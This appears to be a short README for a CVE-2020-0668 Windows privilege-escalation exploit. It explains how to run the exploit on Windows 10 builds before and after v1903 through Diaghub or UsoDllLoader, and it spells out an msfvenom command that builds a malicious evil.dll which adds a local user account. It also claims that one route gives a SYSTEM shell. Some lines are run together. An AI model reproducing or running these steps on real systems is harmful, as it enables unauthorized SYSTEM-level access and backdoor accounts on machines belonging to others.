
Make CVE-2020-0668 exploit work for version < win10 v1903 and version >= win10 v1903
Make CVE-2020-0668 exploit work for version < win10 v1903 and version >= win10 v1903
powershell exploit works on version < win10 v1903 with Diaghub.
evil.dll with msfvenom
msfvenom -p windows/x64/exec CMD="net user test test /add" -f dll > evil.dllexp.ps1 with powershellDiaghub.exe C:\ProgramData evil.dll to load dll and add user.
powershell exploit works on version >= win10 v1903 with UsoDllLoader.
exp.ps1 with powershellUsoDllLoader.exe to get a system shell
A x86 release version of SysTracingPoc for issue,exploit works on version >= win10 v1903 because of UsoLoadDll.
A .net PoC. If you take a look at C:\Windows\System32\evil.dll and rename it as evil.txt.
You will find it not a dll file. Only tracing log in it.
A powershell PoC. Also only tracing log in evil.dll.